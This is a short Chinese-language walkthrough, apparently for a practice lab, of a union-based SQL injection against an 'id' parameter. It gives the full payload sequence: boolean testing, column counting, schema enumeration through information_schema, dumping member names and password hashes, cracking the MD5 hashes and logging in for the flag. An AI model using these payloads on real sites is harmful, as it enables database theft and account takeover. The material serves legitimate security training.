1.点击访问进入网站
2.点击登录下面的维护通知
3.布尔判断
id=1 and 1=1 --+ 页面正常
id=1 and 1=2 --+ 页面异常 存在注入
4.判断列数 order by 4 --+页面正常
order by 5 --+页面异常证明有4列
5.判断回显点id=-1 union select 1,2,3,4 --+
回显位置为2,3
6.查询当前库名union select 1,database(),3,4 --+
7.查询表名id=-1 union select 1,group_concat(table_name),3,4 from information_schema.tables where table_schema='mozhe_Discuz_StormGroup'--+
8.查列名id=-1 union select 1,group_concat(column_name),3,4 from information_schema.columns where table_schema='mozhe_Discuz_StormGroup' and table_name='StormGroup_member' --+
9.查看字段获得两条密码id=-1 union select 1,2,group_concat(name,id,password),4 from StormGroup_member--+
10.使用MD5解密 cmd5.com
11.最后进行登录得到key